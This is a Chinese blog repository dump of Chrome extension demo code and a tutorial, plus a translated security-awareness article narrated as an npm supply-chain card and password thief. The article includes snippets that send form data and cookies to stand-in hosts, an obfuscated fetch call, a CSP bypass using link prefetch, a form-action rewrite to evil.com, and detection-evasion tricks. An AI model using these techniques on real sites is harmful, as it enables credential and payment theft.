205 | });
206 | 
207 | // 显示桌面通知
208 | $('#show_notification').click(e => {
209 | 	chrome.notifications.create(null, {
210 | 		type: 'image',
211 | 		iconUrl: 'img/icon.png',
212 | 		title: '祝福',
213 | 		message: '骚年，祝你圣诞快乐！Merry christmas!',
214 | 		imageUrl: 'img/sds.png'
215 | 	});
216 | });
217 | 
218 | $('#check_media').click(e => {
219 | 	alert('即将打开一个有视频的网站，届时将自动检测是否存在视频！');
220 | 	chrome.tabs.create({url: 'http://www.w3school.com.cn/tiy/t.asp?f=html5_video'});
221 | });


--------------------------------------------------------------------------------
/src/我是如何从你的网站盗取银行卡和密码的.md:
--------------------------------------------------------------------------------
  1 | # 我是如何从你的网站盗取银行卡和密码的
  2 | > 译者：本文翻译自[hackermoon上的文章](https://hackernoon.com/im-harvesting-credit-card-numbers-and-passwords-from-your-site-here-s-how-9a8cb347c5b5)，希望本文能唤起广大前端工作者的安全意识，以下为正文:
  3 | 
  4 | *** 
  5 | 
  6 | > 以下是一个真实的故事。或者它可能只是基于一个真实的故事。也许这根本不是真的。
  7 | 
  8 | 这周是一个安全恐慌周——似乎每天都有一个新的漏洞被发现。当家里人询问我相关的事情时，我需要假装我很懂行，这真的让我感到很煎熬。
  9 | 
 10 | 看到与我亲近的人都在忧虑“网络安全”，这确实让我有所感触。
 11 | 
 12 | 所以，我怀着沉重的心情，决定干净利落地告诉你，我过去几年是如何偷你的网站上的用户名，密码和信用卡号码。
 13 | 
 14 | ***
 15 | 
 16 | 恶意代码本身非常简单，当它在满足以下条件的页面上运行时，它就能发挥作用：
 17 | 
 18 | * 该页面有一个\<form>标签
 19 | * 一个input[type="password"]元素，或者name属性为"cardnumber"或"cvc"的元素等
 20 | * 该页面包含“信用卡”，“结账”，“登录”，“密码”等字样。
 21 | 
 22 | 然后，当密码/信用卡字段上出现"blur"事件或form标签上监听到"submit"事件时，我的代码会：
 23 | 
 24 | * 获取页面上的所有表单字段（document.forms.forEach(…)）
 25 | * 获取document.cookie
 26 | * 将这些信息变成随机的字符串：
 27 | ```jsx
 28 |  const payload = btoa(JSON.stringify(sensitiveUserData))
 29 | ```
 30 | * 然后将其发送到`https://legit-analytics.com?q=${payload}`（当然这不是真正的域名）
 31 | 
 32 | 简而言之，只要是看起来对我有价值的数据，我就会把它发送到我的服务器。
 33 | 
 34 | ***
 35 | 
 36 | 2015年时，当我第一次编写这段代码时，它毫无用处，只能躲在我电脑的某个角落里。我需要把它散布到这个世界，进入你的网站。
 37 | 
 38 | 引用Google的一句话：如果攻击者成功注入了任何代码，那么游戏结束了！
 39 | 
 40 | XSS规模太小，而且已经被针对保护得很好了。
 41 | 
 42 | Chrome扩展程序也是被限制地死死的。
 43 | 
 44 | 幸运的是，我们生活在一个人人都使用npm的时代，就像人们喜欢磕止痛药一样。
 45 | 
 46 | *** 
 47 | 
 48 | 所以，npm是我的注入代码的方法。我需要创造一些有用的开源软件，让人们不假思索地安装——我的特洛伊木马。
 49 | 
 50 | 人们喜欢漂亮的颜色 - 这是我们与狗之间的区别 - 所以我写了一个包，让你以任何颜色登录控制台。
 51 | 
 52 | ![图片](https://github.com/luke93h/git-blog/blob/master/imgs/console.png?raw=true)
 53 | 
 54 | 我很兴奋 - 我有一个引人注目的npm包 - 但我不想等待人们慢慢发现，并分享这个包。所以我开始为现有的包提PR，将我的彩色包添加到它们的依赖项中。
 55 | 
 56 | 我为数百个前端包或者他们的依赖项提PR（当然是用各种用户帐户，而不是全用“David Gilbertson”这个账号）：“嘿，我已经解决了问题x，并且还添加了一些日志记录。”
 57 | 
 58 | 看，我正在为开源做贡献！
 59 | 
 60 | 有很多敏感的人告诉我，他们不想要新的依赖，但这是能预期的，这是一个数字游戏。
 61 | 
 62 | 总体而言，我取得了巨大成功，我的彩色控制台代码现在被23个软件包依赖。其中一个软件包本身被广泛的依赖 - 我的摇钱树。我不会说出它的名字，但是可以告诉你的是，它正在不断填充我的金库。
 63 | 
 64 | 这只是一个包。我还有其他6个包正在运作着。
 65 | 
 66 | 我现在每月大约被下载120,000次，我很自豪地宣布，我那些可恶的代码每天都在数千个网站上执行，包括少数Alexa-top上前1000网站，它们向我发送大量用户名，密码和信用卡明细。
 67 | 
 68 | ***
 69 | 
 70 | 回顾过去的黄金岁月，我无法相信人们为了将跨站代码放入单个站点而花费大量精力。现在，在我的前端朋友的帮助下，我将恶意代码发送到数千个网站非常容易。
 71 | 
 72 | <h1>你可能会对我的盗窃提出一些疑问......</h1>
 73 | 
 74 | <h2>我注意到了你发出的网络请求！</h2>
 75 | 
 76 | 你会在哪里注意到它们？当DevTools打开时，我的代码不会发送任何内容（即使没有被展开）。
 77 | 
 78 | 我把这称为海森堡机动：如果你试图观察我代码的行为，我代码的行为将会发生改变。
 79 | 
 80 | 在localhost或任何IP地址上运行时，或者域名中包含dev，test，qa，uat或staging（由\b字边界包围）等字样时，它也保持静默。
 81 | 
 82 | <h2>但渗透测试人员会在他们的HTTP请求监控工具中看到它！</h2>
 83 | 
 84 | 测试人员工作几个小时？我的代码在工作日的早上7点到晚上7点之间没有发送任何内容。我的收获减半了，但减少了95％被抓的几率。
 85 | 
 86 | 而且，你的密码我只需要一次。因此，我在一台设备上发起请求后，我记下了它（本地存储和cookie），该设备再也不会发起请求。
 87 | 
 88 | 即使有一些勤奋的测试人员不断地（在周末）清除cookie和本地存储，我也只是间歇性地发送这些请求（大约七次，轻微随机化 ）。
 89 | 
 90 | 此外，该网址看起来很像您网站对其他300个广告发起的网络请求。
 91 | 
 92 | 也许你有一个自动测试程序，每周7天每天24小时填写付款表格并检查可疑的网络请求。您使用的是PhantomJS，Selenium，W​​ebDriver还是friends？抱歉，它们都为窗口添加了易于检测的属性，因此在检测到后，我不会发起任何请求。
 93 | 
 94 | 关键是，仅仅因为你没有看到它，并不意味着它没有发生。这已经两年多了，据我所知，至今为止没有任何人注意到我的请求。也许它现在就在你的网站上:)
 95 | 
 96 | （有趣的是，当我查看我收集的所有密码和信用卡号码，并将它们捆绑起来在黑暗网上出售时，我必须过滤我自己的信用卡号码和用户名，以防我出卖了我自己。真是可笑！）
 97 | 
 98 | <h2>我会在你的GitHub源代码中看到它！</h2>
 99 | 
100 | 你的单纯温暖了我的心。
101 | 
102 | 但是很遗憾，将一个版本的代码发送到GitHub，并将其他版本发送到npm是完全可行的。
103 | 
104 | 在我的package.json中，我将files属性指向包含压缩代码的lib文件夹 - 这是npm publish命令将发送给npm服务器的文件夹。但是lib在我的.gitignore中，它永远不会被推送到GitHub。这是一种很常见的做法，因此您在GitHub上找不到任何疑点。
105 | 
106 | 这不是一个npm问题，即使我没有向npm和GitHub推送不同的代码，谁能保证你所看到的/lib/package.min.js是/src/package.js压缩后的真正结果？
107 | 
108 | 所以很抱歉，你不会在GitHub上的任何地方找到我那可恶的代码。
109 | 
110 | <h2>我读了node_modules中所有压缩后的源码！</h2>
111 | 
112 | 好了，现在你只是在单纯的找茬。但也许你认为你可以写一些聪明的代码，自动检查代码是否有任何可疑之处。
113 | 
114 | 你仍然不会在我的源代码中发现任何有意义的东西，在我代码中的任何地方都不会找到fetch或XMLHttpRequest ，或者我要发送到的域名。我的fetch代码如下所示：
115 | 
116 | ```jsx
117 | const i = 'gfudi';
118 | const k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() - 1)).join('');
119 | self[k(i)](urlWithYourPreciousData);
120 | ```
121 | 
122 | “gfudi”只是“fetch”，每个字母向前移动一位。解密方法就在上面。self只是window的别名。
123 | 
124 | 甚至还可以用self['\u0066\u0065\u0074\u0063\u0068'\]\(...\)来表示fetch(...)。
125 | 
126 | 重点是：你更本没有任何机会，在混淆的代码中发现可疑的代码。
127 | 
128 | （尽管如此，实际上我并没有使用平凡的fetch，如果可以，我更喜欢用new EventSource(urlWithYourPreciousData)。这样即使你是偏执狂，并通过serviceWorker监听fetch事件来监控请求，我依旧可以绕过去。只要是支持serviceWorker但不支持EventSource的浏览器，我便不会发送任何内容。）
129 | 
130 | <h2>我有content security policy！</h2>
131 | 
132 | 哦？你现在真的有吗？
133 | 
134 | 或许有人告诉你，这能阻止恶意代码发起请求？我讨厌成为坏消息的传递者，但是即使是最严格的content security policy，以下四行代码也会能绕过去。
135 | 
136 | ```jsx
137 | const linkEl = document.createElement('link');
138 | linkEl.rel = 'prefetch';
139 | linkEl.href = urlWithYourPreciousData;
140 | document.head.appendChild(linkEl);
141 | ```
142 | 
143 | （在这篇文章的早期版本中，我说一个可靠的content security policy会让你（并且我加了引号）“100％安全”。不幸的是，在我学会上述技巧之前，已经有130k人读过这个了）
144 | 
145 | 但是CSP（content security policy ）并不是完全无益的。上述方法只适用于Chrome，一个不错的CSP 能那些在较少使用的浏览器中阻止我的盗窃行为。
146 | 
147 | 如果您还不知道，content security policy可以限制从浏览器发出的网络请求。它旨在限制您可以带入浏览器的内容，但也可以 - 作为副作用 - 限制数据发送出去的方式（当我将密码发送到我的服务器时，它只是一个查询参数得到请求）。
148 | 
149 | 如果我无法使用预请求获取数据，那么CSP对我的信用卡收集来说很棘手。而且不仅仅是因为限制到了我的恶意请求。
150 | 
151 | 您看，如果我尝试从具有CSP的站点发送数据，它可以向站点所有者警告失败的尝试（如果他们指定了一个反馈的url）。他们最终会跟踪我的代码，并可能打电话给我的母亲，那我麻烦就大了。
152 | 
153 | 由于我不想引来注意，我会在尝试发送内容之前检查你的CSP。
154 | 
155 | 为此，我在当前页面发起虚拟请求，并读取响应头。
156 | 
157 | ```jsx
158 | fetch(document.location.href)
159 | .then(resp => {
160 |   const csp = resp.headers.get('Content-Security-Policy');
161 |   // does this exist? Is is any good?
162 | });
163 | ```
164 | 
165 | 在这一点上，我可以寻找绕过CSP的方法。Google登录页面上有一个CSP，如果我的代码在该页面上运行，我可以轻松发送您的用户名和密码。他们没有明确设置connect-src，也没有设置catch-all default-src，所以我可以发送你的凭据。
166 | 
167 | 如果您向我邮寄10美元，我会告诉您我的代码是否在Google登录页面上运行。
168 | 
169 | 亚马逊在您输入信用卡号的页面上根本没有CSP，eBay也没有。
170 | 
171 | Twitter和PayPal都有CSP，但从它们那里获取数据仍然很容易。这两个允许以相同的方式在后台发送数据，这可能是其他网站也允许的标志。乍一看，一切都看起来非常彻底，它们都有设置catch-all default-src。但这里有一个破坏者：这个catch-all完全没起作用，因为他们没有锁定form-action。
172 | 
173 | 所以，当我检查你的CSP（并且会检查两次）时，如果其他一切都被锁定但我没有看到form-action，我只是去改变（当你点击'登录时发送数据的地方） '）所有表单上的action。
174 | 
175 | ```jsx
176 | Array.from(document.forms).forEach(formEl => formEl.action = `//evil.com/bounce-form`);
177 | ```
178 | 
179 | 嘭！谢谢你给我发送你的PayPal用户名和密码，朋友。我会寄给你一张感谢卡，上面写着我用你的钱买的东西的照片。
180 | 
181 | 当然，我只对每个设备执行一次此操作，然后将用户反弹回到引用页面，在那里他们会耸耸肩并再试一次。
182 | 
183 | （使用这种方法，我接管了特朗普的Twitter帐户并开始发送各种奇怪的东西。至今没有人注意到。）
184 | 
185 | <h1>好的，我很关心，我该怎么办？</h1>
186 | 
187 | ### 选项一：
188 | 
189 | ![yewai](https://github.com/luke93h/git-blog/blob/master/imgs/yewai.jpeg?raw=true)
190 | 
191 | 在这里，你会很安全。
192 | 
193 | ### 选项2：
194 | 
195 | 我在后续帖子中详细说明了这一点，[第2部分：如何阻止我从您的网站上获取信用卡号和密码。](https://hackernoon.com/part-2-how-to-stop-me-harvesting-credit-card-numbers-and-passwords-from-your-site-844f739659b9)
196 | 
197 | 在任何收集您不希望我（或我的其他攻击者）拥有的数据的页面上，不要使用npm模块。或Google跟踪代码管理器，广告网络或分析，或任何不属于您的代码。
198 | 
199 | 正如此处所建议的那样，您可能需要考虑在iFrame中提供用于登录和信用卡收集的专用轻量级页面。
200 | 
201 | 您仍然可以使用带有938个npm包的大型React应用程序，用于开发页眉/页脚/导航/任何内容，但是用户键入的页面部分应该位于安全的iFrame中，并且它只包含手打的JavaScript代码（并且是未压缩的代码）——如果你想进行客户端验证。


--------------------------------------------------------------------------------
/examples/chrome-extension/js/popup.js:
--------------------------------------------------------------------------------
  1 | // Copyright (c) 2014 The Chromium Authors. All rights reserved.
  2 | // Use of this source code is governed by a BSD-style license that can be
  3 | // found in the LICENSE file.
  4 | 
  5 | /**
  6 |  * Get the current URL.
  7 |  *
  8 |  * @param {function(string)} callback called when the URL of the current tab
  9 |  *   is found.
 10 |  */
 11 | 
 12 | function getCurrentTabUrl(callback) {
 13 |   // Query filter to be passed to chrome.tabs.query - see
 14 |   // https://developer.chrome.com/extensions/tabs#method-query
 15 |   var queryInfo = {
 16 |     active: true,
 17 |     currentWindow: true
 18 |   };
 19 | 
 20 |   chrome.tabs.query(queryInfo, (tabs) => {
 21 |     // chrome.tabs.query invokes the callback with a list of tabs that match the
 22 |     // query. When the popup is opened, there is certainly a window and at least
 23 |     // one tab, so we can safely assume that |tabs| is a non-empty array.
 24 |     // A window can only have one active tab at a time, so the array consists of
 25 |     // exactly one tab.
 26 |     var tab = tabs[0];
 27 |     // A tab is a plain object that provides information about the tab.
 28 |     // See https://developer.chrome.com/extensions/tabs#type-Tab
 29 |     var url = tab.url;
 30 | 
 31 |     // tab.url is only available if the "activeTab" permission is declared.
 32 |     // If you want to see the URL of other tabs (e.g. after removing active:true
 33 |     // from |queryInfo|), then the "tabs" permission is required to see their
 34 |     // "url" properties.
 35 |     console.assert(typeof url == 'string', 'tab.url should be a string');
 36 | 
 37 |     callback(url);
 38 |   });
 39 | 
 40 |   // Most methods of the Chrome extension APIs are asynchronous. This means that
 41 |   // you CANNOT do something like this:
 42 |   //
 43 |   // var url;
 44 |   // chrome.tabs.query(queryInfo, (tabs) => {
 45 |   //   url = tabs[0].url;
 46 |   // });
 47 |   // alert(url); // Shows "undefined", because chrome.tabs.query is async.
 48 | }
 49 | 
 50 | /**
 51 |  * Change the background color of the current page.
 52 |  *
 53 |  * @param {string} color The new background color.
 54 |  */
 55 | 
 56 | function startPoll(infos) {
 57 |   // See https://developer.chrome.com/extensions/tabs#method-executeScript.
 58 |   // chrome.tabs.executeScript allows us to programmatically inject JavaScript
 59 |   // into a page. Since we omit the optional first argument "tabId", the script
 60 |   // is inserted into the active tab of the current window, which serves as the
 61 |   // default.
 62 |   
 63 |   sendMessageToContentScript({type:'start', payload:infos}, function(response){
 64 |   });
 65 | }
 66 | 
 67 | /**
 68 |  * Gets the saved background color for url.
 69 |  *
 70 |  * @param {string} url URL whose background color is to be retrieved.
 71 |  * @param {function(string)} callback called with the saved background color for
 72 |  *     the given url on success, or a falsy value if no color is retrieved.
 73 |  */
 74 | function getSaved(url, callback) {
 75 |   // See https://developer.chrome.com/apps/storage#type-StorageArea. We check
 76 |   // for chrome.runtime.lastError to ensure correctness even when the API call
 77 |   // fails.
 78 |   chrome.storage.sync.get(url, (items) => {
 79 |     callback(chrome.runtime.lastError ? null : items[url]);
 80 |   });
 81 | }
 82 | 
 83 | /**
 84 |  * Sets the given background color for url.
 85 |  *
 86 |  * @param {string} url URL for which background color is to be saved.
 87 |  * @param {string} color The background color to be saved.
 88 |  */
 89 | function saveInputValue(url, infos) {
 90 |   var items = {};
 91 |   items[url] = infos;
 92 |   // See https://developer.chrome.com/apps/storage#type-StorageArea. We omit the
 93 |   // optional callback since we don't need to perform any action once the
 94 |   // background color is saved.
 95 |   chrome.storage.sync.set(items);
 96 | }
 97 | 
 98 | // This extension loads the saved background color for the current tab if one
 99 | // exists. The user can select a new background color from the dropdown for the
100 | // current page, and it will be saved as part of the extension's isolated
101 | // storage. The chrome.storage API is used for this purpose. This is different
102 | // from the window.localStorage API, which is synchronous and stores data bound
103 | // to a document's origin. Also, using chrome.storage.sync instead of
104 | // chrome.storage.local allows the extension data to be synced across multiple
105 | // user devices.
106 | document.addEventListener('DOMContentLoaded', () => {
107 |   getCurrentTabUrl((url) => {
108 |     var startBtn = document.getElementById('start');
109 |     var codeInput = document.getElementById('code');
110 |     var numberInput = document.getElementById('number');
111 |     var intervalInput = document.getElementById('number');
112 | 
113 |     // Load the saved background color for this page and modify the dropdown
114 |     // value, if needed.
115 |     getSaved(url, (infos) => {
116 |       if (infos) {
117 |         startPoll(infos);
118 |         codeInput.value = infos.code;
119 |         numberInput.value = infos.number;
120 |         intervalInput.value = infos.intervalInput;
121 |       }
122 |     });
123 | 
124 |     // Ensure the background color is changed and saved when the dropdown
125 |     // selection changes.
126 |     startBtn.addEventListener('click', () => {
127 |       var infos = {
128 |         code: codeInput.value,
129 |         number: numberInput.value,
130 |         intervalInput: intervalInput.value
131 |       }
132 |       startPoll(infos);
133 |       saveInputValue(url, {
134 |         code: codeInput.value,
135 |         number: numberInput.value,
136 |         intervalInput: intervalInput.value
137 |       });
138 |     });
139 |   });
140 | });
141 | 
142 | function sendMessageToContentScript(message, callback){
143 | 	chrome.tabs.query({active: true, currentWindow: true}, function(tabs){
144 | 		chrome.tabs.sendMessage(tabs[0].id, message, function(response){
145 | 			if(callback) callback(response);
146 | 		});
147 | 	});
148 | }
149 | 
150 | chrome.runtime.onMessage.addListener(function(request, sender, sendResponse){
151 |   // console.log(sender.tab ?"from a content script:" + sender.tab.url :"from the extension");
152 |   if(request.type == 'refresh') {
153 |     var payload = request.payload
154 |     var trDom = document.querySelectorAll('#' + payload.code)
155 |     if(trDom.length > 0){
156 |       trDom[0].querySelectorAll('td.stock')[0].innerHTML = payload.stock
157 |       trDom[0].querySelectorAll('td.time')[0].innerHTML = payload.time
158 |     }else{
159 |       document.querySelectorAll('#result table tbody')[0].appendChild(createTr(payload))
160 |     }
161 |   }
162 | });
163 | function createTr(info){
164 |   var tr = document.createElement("tr")
165 |   tr.id = info.code
166 |   tr.innerHTML = 
167 |     '<td class="name">' +
168 |       info.name +
169 |     '</td>' +
170 |     '<td class="stock">' +
171 |       info.stock +
172 |     '</td>' +
173 |     '<td class="time">' +
174 |       info.time +
175 |     '</td>' 
176 |     return tr
177 | }


--------------------------------------------------------------------------------
/src/如何开发chrome-extension.md:
--------------------------------------------------------------------------------
  1 | # chrome extension简介
  2 | 
  3 | ## chrome extension是什么
  4 | 
  5 | 1. chrome extension开发成本低，由一些文件（包括 HTML、CSS、JavaScript、图片以及其他任何您需要的文件）经过 zip 打包得到，本质上是网页。
  6 | 2. chrome extension不仅可以利用[浏览器为网页提供的所有 API](https://crxdoc-zh.appspot.com/extensions/api_other)，还可以用[chrome为扩展程序提供了许多专用 API](https://crxdoc-zh.appspot.com/extensions/api_index)。
  7 | 
  8 | ## 为什么要用chrome extension
  9 | 
 10 | 1. 有些场景下，我们并不是网页的开发者，但想要为网站添加更多的功能，这时候也可以用chrome extension来解决。
 11 | 2. chrome extension拥有比网页更加丰富的api
 12 | 
 13 | ## chrome扩展能做什么
 14 | 
 15 | 1. 代理：[Proxy SwitchyOmega](https://chrome.google.com/webstore/detail/proxy-switchyomega/padekgcemlokbadohgkifijomclgjgif)
 16 | 2. 开发者工具: [react](https://chrome.google.com/webstore/detail/react-developer-tools/fmkadmapgofadopljbjfkapdkoienihi)、[redux](https://chrome.google.com/webstore/detail/redux-devtools/lmhkpmbekcpmknklioeibfkpmmfibljd)
 17 | 3. 广告过滤：[AdGuard 广告拦截器](https://chrome.google.com/webstore/detail/adguard-adblocker/bgnkhhnnamicmpeenaelnjfhikgbkllg)
 18 | 4. 抢票软件：[台湾高铁抢票插件](https://chrome.google.com/webstore/detail/%E5%8F%B0%E6%B9%BE%E9%AB%98%E9%93%81%E6%8A%A2%E7%A5%A8%E6%8F%92%E4%BB%B6/nfkfaajobpcjpmcmpcacncimfmjppgoj)
 19 | 5. 视频下载: [优酷一键通](https://chrome.google.com/webstore/detail/%E4%BC%98%E9%85%B7%E4%B8%80%E9%94%AE%E9%80%9A/alddjbjplgobbllfolehibiclbhmomla)
 20 | 6. 等等
 21 | 
 22 | ## 开发与调试
 23 | 
 24 | 1. 加载扩展文件：扩展程序页面（chrome://extensions），开启开发者模式，点击“加载已解压的扩展程序”
 25 | 2. 更新：扩展程序页面（chrome://extensions），点击“更新”
 26 | 3. 调试popup.js：右击扩展图标，点击“审核弹出内容”
 27 | 
 28 | ## 文件组成
 29 | 
 30 | 1. [清单文件-manifest.json](#manifest)
 31 | 2. 一个或多个 HTML 文件（除非扩展程序是一个主题背景）
 32 | 3. 可选：一个或多个 JavaScript 文件
 33 | 4. 可选：您的扩展程序需要的任何其他文件，例如图片
 34 | 
 35 | ## 引用文件
 36 | 
 37 | 1. 先对路径
 38 | ```
 39 | <img src="images/myimage.png">
 40 | ```
 41 | 2. 绝对路径，使用浏览器访问
 42 | ```
 43 | chrome-extension://<扩展程序标识符>/<文件路径>
 44 | ```
 45 | 
 46 | ## 清单文件-manifest.json
 47 | 
 48 | [完整清单文件格式](https://crxdoc-zh.appspot.com/extensions/manifest)
 49 | ```jsx
 50 | {
 51 |     // 清单文件的版本，这个必须写，而且必须是2
 52 |     "manifest_version": 2,
 53 |     // 插件的名称
 54 |     "name": "demo",
 55 |     // 插件的版本
 56 |     "version": "1.0.0",
 57 |     // 插件描述
 58 |     "description": "简单的Chrome扩展demo",
 59 |     // 图标，一般偷懒全部用一个尺寸的也没问题
 60 |     "icons":
 61 |     {
 62 |         "16": "img/icon.png",
 63 |         "48": "img/icon.png",
 64 |         "128": "img/icon.png"
 65 |     },
 66 |     // 会一直常驻的后台JS或后台页面
 67 |     "background":
 68 |     {
 69 |         // 2种指定方式，如果指定JS，那么会自动生成一个背景页
 70 |         "page": "background.html"
 71 |         //"scripts": ["js/background.js"]
 72 |     },
 73 |     // 浏览器右上角图标设置，browser_action、page_action、app必须三选一
 74 |     "browser_action": 
 75 |     {
 76 |         "default_icon": "img/icon.png",
 77 |         // 图标悬停时的标题，可选
 78 |         "default_title": "这是一个示例Chrome插件",
 79 |         "default_popup": "popup.html"
 80 |     },
 81 |     // 当某些特定页面打开才显示的图标
 82 |     /*"page_action":
 83 |     {
 84 |         "default_icon": "img/icon.png",
 85 |         "default_title": "我是pageAction",
 86 |         "default_popup": "popup.html"
 87 |     },*/
 88 |     // 需要直接注入页面的JS
 89 |     "content_scripts": 
 90 |     [
 91 |         {
 92 |             //"matches": ["http://*/*", "https://*/*"],
 93 |             // "<all_urls>" 表示匹配所有地址
 94 |             "matches": ["<all_urls>"],
 95 |             // 多个JS按顺序注入
 96 |             "js": ["js/jquery-1.8.3.js", "js/content-script.js"],
 97 |             // JS的注入可以随便一点，但是CSS的注意就要千万小心了，因为一不小心就可能影响全局样式
 98 |             "css": ["css/custom.css"],
 99 |             // 代码注入的时间，可选值： "document_start", "document_end", or "document_idle"，最后一个表示页面空闲时，默认document_idle
100 |             "run_at": "document_start"
101 |         },
102 |         // 这里仅仅是为了演示content-script可以配置多个规则
103 |         {
104 |             "matches": ["*://*/*.png", "*://*/*.jpg", "*://*/*.gif", "*://*/*.bmp"],
105 |             "js": ["js/show-image-content-size.js"]
106 |         }
107 |     ],
108 |     // 权限申请
109 |     "permissions":
110 |     [
111 |         "contextMenus", // 右键菜单
112 |         "tabs", // 标签
113 |         "notifications", // 通知
114 |         "webRequest", // web请求
115 |         "webRequestBlocking",
116 |         "storage", // 插件本地存储
117 |         "http://*/*", // 可以通过executeScript或者insertCSS访问的网站
118 |         "https://*/*" // 可以通过executeScript或者insertCSS访问的网站
119 |     ],
120 |     // 普通页面能够直接访问的插件资源列表，如果不设置是无法直接访问的
121 |     "web_accessible_resources": ["js/inject.js"],
122 |     // 插件主页，这个很重要，不要浪费了这个免费广告位
123 |     "homepage_url": "https://www.baidu.com",
124 |     // 覆盖浏览器默认页面
125 |     "chrome_url_overrides":
126 |     {
127 |         // 覆盖浏览器默认的新标签页
128 |         "newtab": "newtab.html"
129 |     },
130 |     // Chrome40以前的插件配置页写法
131 |     "options_page": "options.html",
132 |     // Chrome40以后的插件配置页写法，如果2个都写，新版Chrome只认后面这一个
133 |     "options_ui":
134 |     {
135 |         "page": "options.html",
136 |         // 添加一些默认的样式，推荐使用
137 |         "chrome_style": true
138 |     },
139 |     // 向地址栏注册一个关键字以提供搜索建议，只能设置一个关键字
140 |     "omnibox": { "keyword" : "go" },
141 |     // 默认语言
142 |     "default_locale": "zh_CN",
143 |     // devtools页面入口，注意只能指向一个HTML文件，不能是JS文件
144 |     "devtools_page": "devtools.html"
145 | }
146 | ```
147 | 
148 | ## 用户界面网页-popup
149 | 
150 | popup是点击browser_action或者page_action图标时打开的一个小窗口网页，焦点离开网页就立即关闭。
151 | 一般用于和用户的交互，并把信息传递给content-scripts或者backgorund.js，实现功能的交互。
152 | 
153 | ![popup](https://github.com/luke93h/git-blog/blob/master/imgs/popup.png?raw=true)
154 | 
155 | 配置方式：
156 | 
157 | ```jsx
158 | {
159 | 	"browser_action":
160 | 	{
161 | 		"default_icon": "img/icon.png",
162 | 		// 图标悬停时的标题，可选
163 | 		"default_title": "这是一个示例Chrome插件",
164 | 		"default_popup": "popup.html"
165 | 	}
166 | }
167 | ```
168 | 
169 | ## content-scripts
170 | 
171 | 所谓content-scripts，其实就是Chrome插件中向页面注入脚本的一种形式（虽然名为script，其实还可以包括css的），借助content-scripts我们可以实现通过配置的方式轻松向指定页面注入JS和CSS（如果需要动态注入，可以参考下文），最常见的比如：广告屏蔽、页面CSS定制，等等。
172 | 
173 | 示例配置：
174 | ```jsx
175 | {
176 | 	// 需要直接注入页面的JS
177 | 	"content_scripts": 
178 | 	[
179 | 		{
180 | 			//"matches": ["http://*/*", "https://*/*"],
181 | 			// "<all_urls>" 表示匹配所有地址
182 | 			"matches": ["<all_urls>"],
183 | 			// 多个JS按顺序注入
184 | 			"js": ["js/jquery-1.8.3.js", "js/content-script.js"],
185 | 			// JS的注入可以随便一点，但是CSS的注意就要千万小心了，因为一不小心就可能影响全局样式
186 | 			"css": ["css/custom.css"],
187 | 			// 代码注入的时间，可选值： "document_start", "document_end", or "document_idle"，最后一个表示页面空闲时，默认document_idle
188 | 			"run_at": "document_start"
189 | 		}
190 | 	],
191 | }
192 | ```
193 | 
194 | ## background
195 | 
196 | 后台（姑且这么翻译吧），是一个常驻的页面，它的生命周期是插件中所有类型页面中最长的，它随着浏览器的打开而打开，随着浏览器的关闭而关闭，所以通常把需要一直运行的、启动就运行的、全局的代码放在background里面。
197 | 
198 | 配置： 
199 | 
200 | ```jsx
201 | {
202 | 	// 会一直常驻的后台JS或后台页面
203 | 	"background":
204 | 	{
205 | 		// 2种指定方式，如果指定JS，那么会自动生成一个背景页
206 | 		"page": "background.html"
207 | 		//"scripts": ["js/background.js"]
208 | 	},
209 | }
210 | ```
211 | 
212 | ## event-pages
213 | 
214 | 这里顺带介绍一下event-pages，它是一个什么东西呢？鉴于background生命周期太长，长时间挂载后台可能会影响性能，所以Google又弄一个event-pages，在配置文件上，它与background的唯一区别就是多了一个persistent参数：
215 | 
216 | 配置： 
217 | 
218 | ```jsx
219 | {
220 | 	"background":
221 | 	{
222 | 		"scripts": ["event-page.js"],
223 | 		"persistent": false
224 | 	},
225 | }
226 | ```
227 | 
228 | # devtools扩展
229 | 
230 | 每打开一个开发者工具窗口，都会创建devtools页面的实例，F12窗口关闭，页面也随着关闭，所以devtools页面的生命周期和devtools窗口是一致的。devtools页面可以访问一组特有的DevTools API以及有限的扩展API，这组特有的DevTools API只有devtools页面才可以访问，background都无权访问，这些API包括：
231 | 
232 | 配置
233 | ```jsx
234 | {
235 | 	// 只能指向一个HTML文件，不能是JS文件
236 | 	"devtools_page": "devtools.html"
237 | }
238 | ```
239 | 
240 | ## 4种类型的JS对比
241 | 
242 | |         JS种类       |  可访问的API                                   |  DOM访问情况	     |  JS访问情况   |  直接跨域  |
243 | |   ------            |  ----------                                    |  -----------      |  ----------  |  -------   |
244 | |   content script    |  只能访问 extension、runtime等部分API            |  可以访问	     |  不可以       |  不可以    |
245 | |   popup js          |  可访问绝大部分API，除了devtools系列              |  不可直接访问	  |  不可以       |  可以      |
246 | |   background js     |  可访问绝大部分API，除了devtools系列              |  不可直接访问	  |  不可以       |  直接跨域  |
247 | |   devtools js       |  只能访问 devtools、extension、runtime等部分API  |  可以	         |  可以         |  不可以    |
248 | 
249 | ## 消息通信
250 | 
251 | |         JS种类       |  content-script                                   |  popup.js	     |  background.js   |
252 | |   ------            |  ----------                                    |  -----------      |  ----------  |
253 | |   content script    |  -            |  chrome.runtime.sendMessage、chrome.runtime.connect	     |  chrome.runtime.sendMessage 、chrome.runtime.connect       |
254 | |   popup.js          |  chrome.tabs.sendMessage 、 chrome.tabs.connect             |  -	  |  chrome.extension. getBackgroundPage()       |
255 | |   background.js     |  chrome.tabs.sendMessage chrome.tabs.connect              |  chrome.extension.getViews	  |  -       |
256 | |   devtools.js       |  -  |  chrome.runtime.sendMessage	         |  chrome.runtime.sendMessage         |
257 | 
258 | 
259 | ##  chrome.* API 
260 | 
261 | Chrome 浏览器为扩展程序提供了许多专用 API，例如 chrome.runtime 与 chrome.alarms。
262 | 参考[文档](https://crxdoc-zh.appspot.com/extensions/api_index)
263 | 
264 | ## 参考
265 | [官方文档](https://developer.chrome.com/extensions/getstarted)
266 | [中文文档(非官方)](https://crxdoc-zh.appspot.com/extensions/getstarted)
267 | [Chrome插件(扩展)开发全攻略](https://www.cnblogs.com/liuxianan/p/chrome-plugin-develop.html)
268 | [sxei的博客](https://github.com/sxei/chrome-plugin-demo)


--------------------------------------------------------------------------------
/src/大前端简介.md:
--------------------------------------------------------------------------------
  1 | # 大前端简介
  2 | 
  3 | ## 目录
  4 | - [简介](#简介)
  5 | - [前端发展史](#前端发展史)
  6 | - [web](#web)
  7 | - [移动端](#小程序)
  8 | - [前端工程化](#前端工程化)
  9 | - [二维动画(canvas)](#二维动画(canvas))
 10 | - [三维动画(webgl)](#三维动画(webgl))
